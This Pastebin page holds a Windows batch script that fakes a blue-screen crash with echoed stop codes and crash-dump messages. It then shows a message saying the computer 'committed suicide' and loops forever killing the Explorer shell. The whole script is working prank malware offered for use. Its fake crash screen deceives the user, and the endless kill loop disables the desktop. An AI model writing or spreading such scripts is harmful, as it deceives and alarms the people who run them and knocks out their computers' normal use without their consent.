Guest User

Untitled

a guest
Nov 23rd, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.52 KB | None | 0 0
  1. @echo off
  2. title C:\ntldr
  3. color 17
  4. echo A problem has been detected and your computer has been shut down to prevent damage to your computer.
  5.  
  6. echo DRIVER_IRQL_NOT_LESS_OR_EQUAL
  7.  
  8. echo If this is the first time you've seen this stop error screen,
  9. echo restart your computer. If this screen appears again, follow
  10. echo these steps:
  11.  
  12. echo Check to make sure that any new hardware or software is properly installed.
  13. echo If this is a new installation, ask your hardware or software manufacturer
  14. echo for any windows updates you might need.
  15.  
  16. echo If problems continue, disable or remove any newly installed hardware
  17. echo or software. Disable BIOS memory options such as caching or shadowing.
  18. echo If you need to use Safe Mode to remove or disable components, restart
  19. echo your computer, press F8 to select Advanced setup options, and then
  20. echo select Safe Mode.
  21.  
  22. echo Technical Information:
  23.  
  24. echo *** STOP: 0x00000D1 (0x0000000000000010, 0x0000000000000002,
  25. echo 0x0000000000000000, 0
  26. echo xFFFFF980007E9166)
  27.  
  28. echo *** ndis.sys - Address 0xFFFFF980007E9166 base at FFFFF9800065C000,
  29. echo DateStamp
  30. echo 44f5584
  31.  
  32. echo Collecting data for crash dump...
  33. echo Initializing disk for crash dump ...
  34. echo Beginning dump of physical memory.
  35. echo Dumping physical memory to disk: 100
  36. echo Physical memory dump complete.
  37. echo Contact your system administrator or technical support group for further assistance.
  38. pause
  39. color 07
  40. cls
  41. dir
  42. cls
  43. msg * Your computer has committed suicide. Have a nice day!
  44. :kill
  45. tskill explorer >nul
  46. goto kill
Add Comment
Please, Sign In to add comment